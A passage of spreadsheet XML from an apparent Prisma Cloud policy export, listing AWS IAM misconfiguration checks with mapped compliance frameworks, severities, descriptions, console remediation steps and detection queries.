          <t>861c6df0-9663-42aa-b729-5218fccc9b50</t>
        </is>
      </c>
      <c r="AI1950" t="inlineStr">
        <is>
          <t>9f2824c8-c27e-415d-9fba-7510760fd369</t>
        </is>
      </c>
      <c r="AJ1950" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1950" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1951">
      <c r="A1951" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, ISO 27002:2022, MLPS 2.0, NIST 800-53 Rev4, RBI Baseline Cyber Security and Resilience Requirements, HITRUST v.9.4.2 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v6.3 [Deprecated], CDC NIST 800-53 Rev4, NIST CSF v2.0, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, ISO 27002:2022, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, SOC 2, ITSG-33, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), PCI DSS v3.2.1, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-172, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, CDC NIST 800-53 Rev4, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CRI Profile v2.0, NIST 800-171 Rev1, Microsoft Cloud Security Benchmark v1, SOC 2, jbrox - GDPR, NIST CSF, jbrox - GDPR, SOC 2, ISO/IEC 27001:2022, MLPS 2.0 (Level 3), NIST 800-53 Rev 5, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, AWS Well-Architected Framework, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, TX-RAMP Level 1, GDPR, ISO 27002:2022, Copy of CIS Controls v8, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, CSA CCM v3.0.1, NIST 800-171 Rev1, NIST 800-171 Rev1, CyberSecurity Law of the People's Republic of China, kfirdaus AWS Account-CS, NIST CSF, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, CSA CCM v3.0.1, NIST SP 800-171 Revision 2, NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1951" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1951" s="2" t="inlineStr"/>
      <c r="D1951" t="inlineStr"/>
      <c r="E1951" t="inlineStr"/>
      <c r="F1951" t="inlineStr"/>
      <c r="G1951" t="b">
        <v>0</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1951" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1951" t="inlineStr">
        <is>
          <t>AWS Elasticsearch IAM policy overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1951" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M1951" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1951" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1951" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1951" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1951" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1951" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1951" t="inlineStr">
        <is>
          <t>PCI DSS v3.2</t>
        </is>
      </c>
      <c r="T1951" t="b">
        <v>0</v>
      </c>
      <c r="U1951" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1951" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1951" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch IAM policies that are overly permissive to all traffic. Amazon Elasticsearch service makes it easy to deploy and manage Elasticsearch. Customers can create a domain where the service is accessible. The domain should be granted access restrictions so that only authorized users and applications have access to the service.</t>
        </is>
      </c>
      <c r="X1951" t="inlineStr">
        <is>
          <t>1. Log in to AWS console
2. Goto the IAM Services
3. Click on 'Policies' in the left-hand panel
4. Search for the Policy for which the Alert is generated and click on it
5. Under the Permissions tab, click on Edit policy
6. Under the Visual editor, for each of the 'Elasticsearch Service', click to expand and perform following.
6.a. Click to expand 'Request conditions'
6.b. Under the 'Source IP', remove the row with the entry '0.0.0.0/0' or '::/0'. Add condition with restrictive IP ranges.
7. Click on Review policy and Save changes.</t>
        </is>
      </c>
      <c r="Y1951" t="inlineStr"/>
      <c r="Z1951" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-policy-version' AND json.rule = document.Statement[?any((Condition.IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains ::/0) and Effect equals Allow and Action anyStartWith es:)] exists</t>
        </is>
      </c>
      <c r="AA1951" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1951" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1951" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-28</t>
        </is>
      </c>
      <c r="AD1951" t="b">
        <v>1</v>
      </c>
      <c r="AE1951" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1951" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>d4524070-4c2d-4316-bf67-3716d5667102</t>
        </is>
      </c>
      <c r="AI1951" t="inlineStr">
        <is>
          <t>27427cb4-e9c0-4a07-a5b1-5be46c956f81</t>
        </is>
      </c>
      <c r="AJ1951" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1951" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1952">
      <c r="A1952" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, ITSG-33, TX-RAMP Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, CRI Profile v1.2.1, CIS Controls v8, kfirdaus AWS Account-CS, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, kashan ACSC Information Security Manual (ISM), SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1952" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1952" s="2" t="inlineStr"/>
      <c r="D1952" t="inlineStr"/>
      <c r="E1952" t="inlineStr"/>
      <c r="F1952" t="inlineStr"/>
      <c r="G1952" t="b">
        <v>1</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1952" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1952" t="inlineStr">
        <is>
          <t>AWS Lambda IAM policy overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1952" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1952" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1952" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1952" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1952" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1952" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1952" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S1952" t="inlineStr"/>
      <c r="T1952" t="b">
        <v>0</v>
      </c>
      <c r="U1952" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1952" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1952" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda IAM policies that are overly permissive to all traffic. It is recommended that the Lambda should be granted access restrictions so that only authorized users and applications have access to the service.
For more details:
https://docs.aws.amazon.com/lambda/latest/dg/security-iam.html</t>
        </is>
      </c>
      <c r="X1952" t="inlineStr">
        <is>
          <t>1. Login to AWS console
2. Goto IAM Services
3. Click on 'Policies' in left hand panel
4. Search for the Policy for which the Alert is generated and click on it
5. Under Permissions tab, click on Edit policy
6. Under the Visual editor, for each of the 'lambda' Service, click to expand and perform following.
6.a. Click to expand 'Request conditions'
6.b. Under the 'Source IP', remove the row with the entry '0.0.0.0/0' or '::/0'. Add condition with restrictive IP ranges.
7. Click on Review policy and Save changes</t>
        </is>
      </c>
      <c r="Y1952" t="inlineStr"/>
      <c r="Z1952" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any((Condition.ForAnyValue:IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains ::/0 or Condition.ForAnyValue:IpAddress.aws:SourceIp contains ::/0) and Effect equals Allow and Action anyStartWith lambda:)] exists</t>
        </is>
      </c>
      <c r="AA1952" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1952" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1952" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-880</t>
        </is>
      </c>
      <c r="AD1952" t="b">
        <v>1</v>
      </c>
      <c r="AE1952" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1952" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>d467be7c-cbc4-4e99-8f4a-9df384da2443</t>
        </is>
      </c>
      <c r="AI1952" t="inlineStr">
        <is>
          <t>f5c60654-2645-4de9-9a36-6e6d0eb540dd</t>
        </is>
      </c>
      <c r="AJ1952" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1952" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1953">
      <c r="A1953" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], APRA (CPS 234) Information Security, ISO 27002:2022, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v3.0.1, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CSA CCM v3.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CIS Controls v8.1, MLPS 2.0, NIST SP 800-171 Revision 3, CSA CCM v4.0.12, ISO 27002:2022, NIST SP 800-172, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, kashan ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Australian Energy Sector Cyber Security Framework (AESCSF), Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, MITRE ATT&amp;CK v8.2 [Deprecated], CHC HITRUST CSF v.9.6.0, NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, NIST CSF, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], CIS Controls v8, MLPS 2.0 (Level 2), CSA CCM v3.0.1, CRI Profile v2.0, MITRE ATT&amp;CK v10.0 [Deprecated], NIST 800-171 Rev1, jbrox - GDPR, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, CSA CCM v3.0.1, AWS Well-Architected Framework, HITRUST CSF v.11.2.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, GDPR, ISO 27002:2022, Copy of CIS Controls v8, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, CSA CCM v4.0.12, CIS Controls v8.1, CCPA 2018, PIPEDA, ISO/IEC 27001:2022, PCI DSS v4.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-171 Rev1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), MITRE ATT&amp;CK v6.3 [Deprecated], FFIEC, MLPS 2.0 (Level 3), PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1953" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1953" s="2" t="inlineStr"/>
      <c r="D1953" t="n">
        <v>0</v>
      </c>
      <c r="E1953" t="n">
        <v>8</v>
      </c>
      <c r="F1953" t="n">
        <v>0</v>
      </c>
      <c r="G1953" t="b">
        <v>1</v>
      </c>
      <c r="H19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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1953" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1953" t="inlineStr">
        <is>
          <t>AWS IAM policy allows assume role permission across all services</t>
        </is>
      </c>
      <c r="L1953" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1953" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1953" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1953" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1953" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1953" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1953" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1953" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1953" t="b">
        <v>0</v>
      </c>
      <c r="U1953" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1953" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1953" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM policy which allows assume role permission across all services. Typically, AssumeRole is used if you have multiple accounts and need to access resources from each account then you can create long term credentials in one account and then use temporary security credentials to access all the other accounts by assuming roles in those accounts.</t>
        </is>
      </c>
      <c r="X1953" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. Navigate to the 'IAM' service.
3. Identify the reported policy
4. Change the Service element of the policy document to be more restrictive so that it only allows AssumeRole permission on select services.</t>
        </is>
      </c>
      <c r="Y1953" t="inlineStr"/>
      <c r="Z1953" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any(Effect equals Allow and Action contains sts:AssumeRole and Resource anyStartWith * and Condition does not exist)] exists and policyArn does not contain iam::aws</t>
        </is>
      </c>
      <c r="AA1953" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1953" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1953" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-43</t>
        </is>
      </c>
      <c r="AD1953" t="b">
        <v>1</v>
      </c>
      <c r="AE1953" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1953" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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3" t="inlineStr">
        <is>
          <t>625b4ce5-b8f1-4bdb-8959-7de645095e2b</t>
        </is>
      </c>
      <c r="AI1953" t="inlineStr">
        <is>
          <t>625b4ce5-b8f1-4bdb-8959-7de645095e2b</t>
        </is>
      </c>
      <c r="AJ1953" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1953" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1954">
      <c r="A1954" t="inlineStr">
        <is>
          <t>CIS v2.0.0 (AWS) - Level 1, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, CIS v3.0.0 (AWS) Level 1, SOC 2, SOC 2, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B1954" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1954" s="2" t="inlineStr"/>
      <c r="D1954" t="inlineStr"/>
      <c r="E1954" t="inlineStr"/>
      <c r="F1954" t="inlineStr"/>
      <c r="G1954" t="b">
        <v>1</v>
      </c>
      <c r="H19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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1954" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1954" t="inlineStr">
        <is>
          <t>AWS IAM AWSCloudShellFullAccess policy is attached to IAM roles, users, or IAM groups</t>
        </is>
      </c>
      <c r="L1954" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1954" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1954" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1954" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1954" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1954" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R1954" t="inlineStr">
        <is>
          <t>A5.2</t>
        </is>
      </c>
      <c r="S1954" t="inlineStr"/>
      <c r="T1954" t="b">
        <v>0</v>
      </c>
      <c r="U1954" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1954" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1954" t="inlineStr">
        <is>
          <t>This policy identifies the AWSCloudShellFullAccess policy attached to IAM roles, users, or IAM groups. AWS CloudShell is a convenient way of running CLI commands against AWS services. The 'AWSCloudShellFullAccess' IAM policy, providing unrestricted CloudShell access, poses a risk of data exfiltration, allowing malicious admins to exploit file upload/download capabilities for unauthorized data transfer. As a security best practice, it is recommended to grant least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X1954" t="inlineStr">
        <is>
          <t>1. Login to the IAM console at https://console.aws.amazon.com/iam/
2. In the left pane, select Policies
3. Search for and select AWSCloudShellFullAccess
4. On the Entities attached tab, for each item, check the box and select Detach</t>
        </is>
      </c>
      <c r="Y1954" t="inlineStr"/>
      <c r="Z1954" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and policyName contains AWSCloudShellFullAccess and (entities.policyRoles[*].roleName exists or entities.policyUsers[*].userName exists or entities.policyGroups[*].groupName exists)</t>
        </is>
      </c>
      <c r="AA1954" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1954" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1954" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-1091</t>
        </is>
      </c>
      <c r="AD1954" t="b">
        <v>1</v>
      </c>
      <c r="AE1954" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1954" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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4" t="inlineStr">
        <is>
          <t>40d4053e-e053-41fb-b7e9-39eef4456a55</t>
        </is>
      </c>
      <c r="AI1954" t="inlineStr">
        <is>
          <t>4f1769ad-6497-449e-82cc-479db4e27ef5</t>
        </is>
      </c>
      <c r="AJ1954" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1954" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1955">
      <c r="A1955" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5,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Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, ITSG-33, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, CRI Profile v1.2.1, CIS Controls v8, kfirdaus AWS Account-CS, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, kashan ACSC Information Security Manual (ISM), SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, AWS Well-Architected Framework, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1955" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1955" s="2" t="inlineStr"/>
      <c r="D1955" t="inlineStr"/>
      <c r="E1955" t="inlineStr"/>
      <c r="F1955" t="inlineStr"/>
      <c r="G1955" t="b">
        <v>1</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1955" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1955" t="inlineStr">
        <is>
          <t>AWS ECS IAM policy overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1955" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M1955" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1955" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1955" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1955" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1955" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1955" t="inlineStr">
        <is>
